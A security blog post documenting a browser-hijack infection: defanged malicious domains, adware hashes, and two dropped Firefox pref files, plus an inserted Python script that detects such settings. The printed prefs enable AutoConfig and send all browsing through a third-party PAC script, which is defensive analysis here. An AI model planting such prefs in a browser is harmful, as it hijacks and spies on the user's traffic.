Sunday 18 February 2018

Browser Hijack – The journey – Cybersecurity research

A new software test.
Something advertised as free… but it is not really free.
Today I wanted to see what level of browser hijacking is running out there.

Browser hijack:

“A program changes your home page, redirects browser typos to a search engine you have never heard of or to other sites. This is annoying, popping up ads and displaying unwanted sites.”

Source: comodo.com

So.

I have seen a lot of “good” things like: a Java “update”, winning iPhones, free apps, casino offers, games, some redirections… etc.

This code was injected into my browser.

“xxxx.rsc.cdn77.org installs malicious extensions, plug-ins, ads, banner ads, pop-up ads, etc. and creates a mess in your browsers. Even if you mistakenly click on any ad or link, it redirects you to some other websites. It also uses cookies and keeps spying on your online activities like browsing history, most visited websites, login and password details, etc. The redirect virus has the ability to disable the anti-virus and other security programs without your knowledge.” Source: removemalwarevirus.com

Here you can see some of the domains I visited on this journey:

  • rsc.cdn77[.]org
  • liveadexchanger[.]com
  • static.199.55.201.138.clients.your-server[.]de
  • timetrackingext[.]xyz
  • 2048-game[.]review
  • search.findthatsearch[.]com
  • findthatsearch[.]com
  • minesweepx[.]com
  • solitaire4u2[.]com
  • tetrigame[.]com
  • certifiedwinners[.]info
  • wtrtr1[.]com
  • ads.dlvr[.]live
  • betano[.]com
  • digitaldsp[.]com
  • c.codeonclick[.]com
  • join.pro-gaming-world[.]com

I found some extra files in my browsers: .js, .cfg and .dll.

3327329.js:

    pref("general.config.obscure_value", 0);
    pref("general.config.filename", "3321791.cfg");
    pref("network.proxy.type", 2);
    pref("network.proxy.autoconfig_url", "http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150");
    pref("network.proxy.autoconfig_url.include_path", true);

3321791.js:

    pref("general.config.obscure_value", 0);
    pref("general.config.filename", "3327329.cfg");
    pref("network.proxy.type", 2);
    pref("network.proxy.autoconfig_url", "http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150");
    pref("network.proxy.autoconfig_url.include_path", true);
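Those two pref files are the interesting part of the find: `general.config.filename` makes Firefox load an AutoConfig (.cfg) file that can override any preference on every start, `general.config.obscure_value` set to 0 tells Firefox the .cfg is plain text rather than byte-shifted, and `network.proxy.type` 2 plus `network.proxy.autoconfig_url` route every request through a PAC script fetched from a third-party host. The following Python script is an added example (not code from the original post) that parses `pref()`/`user_pref()` calls and reports exactly those settings, so a defender can sweep prefs.js, user.js and dropped .js files for the same pattern. The sample input is reconstructed from the 3327329.js lines quoted above; the `trusted_pac_hosts` allow-list, the rule wording and the benign comparison file are my own assumptions.

```python
"""Flag Firefox pref() settings that hand proxying or AutoConfig to a third party."""
import re
import sys
from urllib.parse import urlparse

# One pref()/user_pref() call. The value is either a quoted string (escaped
# quotes allowed) or a bare token such as 0, 2, true or false.
PREF_RE = re.compile(
    r'(?:user_)?pref\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*'
    r'("(?:[^"\\]|\\.)*"|[^)]*?)\s*\)'
)


def _coerce(raw):
    """Turn the raw value text into str, bool or int."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1].replace('\\"', '"')
    if raw in ("true", "false"):
        return raw == "true"
    try:
        return int(raw)
    except ValueError:
        return raw


def parse_prefs(text):
    """Parse every pref()/user_pref() call in text (one line or many) into a dict."""
    return {m.group(1): _coerce(m.group(2)) for m in PREF_RE.finditer(text)}


def check_prefs(prefs, trusted_pac_hosts=()):
    """Return (pref, value, reason) findings for hijack-style settings.

    trusted_pac_hosts is an assumed allow-list of hosts permitted to serve a
    PAC file in your environment; a PAC URL on any other host is reported.
    """
    findings = []
    if "general.config.filename" in prefs:
        findings.append(("general.config.filename", prefs["general.config.filename"],
                         "AutoConfig file enabled; it can override any preference on every start"))
    obscure = prefs.get("general.config.obscure_value")
    if type(obscure) is int and obscure == 0:
        findings.append(("general.config.obscure_value", 0,
                         "AutoConfig file read as plain text (no byte-shift), typical of a dropped config"))
    if prefs.get("network.proxy.type") == 2:
        url = str(prefs.get("network.proxy.autoconfig_url", ""))
        host = urlparse(url).hostname or ""
        if host not in trusted_pac_hosts:
            findings.append(("network.proxy.autoconfig_url", url,
                             "all requests routed through a PAC script from untrusted host %r" % host))
    if prefs.get("network.proxy.autoconfig_url.include_path") is True:
        findings.append(("network.proxy.autoconfig_url.include_path", True,
                         "full URL path and query are handed to the PAC script (leaks browsing detail)"))
    return findings


def scan_file(path, trusted_pac_hosts=()):
    """Read a prefs.js / user.js / dropped .js pref file from disk and check it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return check_prefs(parse_prefs(fh.read()), trusted_pac_hosts)


# Constructed sample: the 3327329.js contents quoted in the post, with the
# blog's curly quotes replaced by the straight quotes Firefox actually expects.
HIJACKED_SAMPLE = (
    'pref("general.config.obscure_value", 0);'
    'pref("general.config.filename", "3321791.cfg");'
    'pref("network.proxy.type", 2);'
    'pref("network.proxy.autoconfig_url", '
    '"http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150");'
    'pref("network.proxy.autoconfig_url.include_path", true);'
)

# Constructed sample of an ordinary user.js for comparison (assumed content).
BENIGN_SAMPLE = """// Mozilla User Preferences
user_pref("browser.startup.homepage", "https://example.org/");
user_pref("network.proxy.type", 0);
"""

if __name__ == "__main__":
    # With file paths as arguments, scan those; otherwise demo on the samples.
    targets = [(p, scan_file(p)) for p in sys.argv[1:]] or [
        ("hijacked sample", check_prefs(parse_prefs(HIJACKED_SAMPLE))),
        ("benign sample", check_prefs(parse_prefs(BENIGN_SAMPLE))),
    ]
    for name, findings in targets:
        print(f"{name}: {len(findings)} finding(s)")
        for pref, value, reason in findings:
            print(f"  {pref} = {value!r}: {reason}")
```

Run it with the paths of prefs.js, user.js and any unexpected .js files found under the Firefox profile or installation directory; the sample above yields four findings, and passing the PAC host through `trusted_pac_hosts` still leaves the three AutoConfig and path-leak findings, which is the point: a PAC URL alone is not proof of hijack, but the combination seen here is.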

Adware Agent – PUA.YoBrowser:

myographical.dll = sandastros.dll

  • MD5: 8ecbfcb3c062755a3d5b3851cbe98357
  • SHA-1: 5d1cccd87d0e4d81090d288d201d9c4467765513

VirusTotal report

VirusTotal graph

Fake Java Update

VirusTotal report

It is clear that it is not a pleasant trip for those who do not know how to protect themselves.

Have fun & Stay safe!!!

http://www.prodefence.org/

Alex Anghelus

Cyber Security, Pentesting & Ethical Hacking Freelancer - Malware Reverse Engineering Researcher

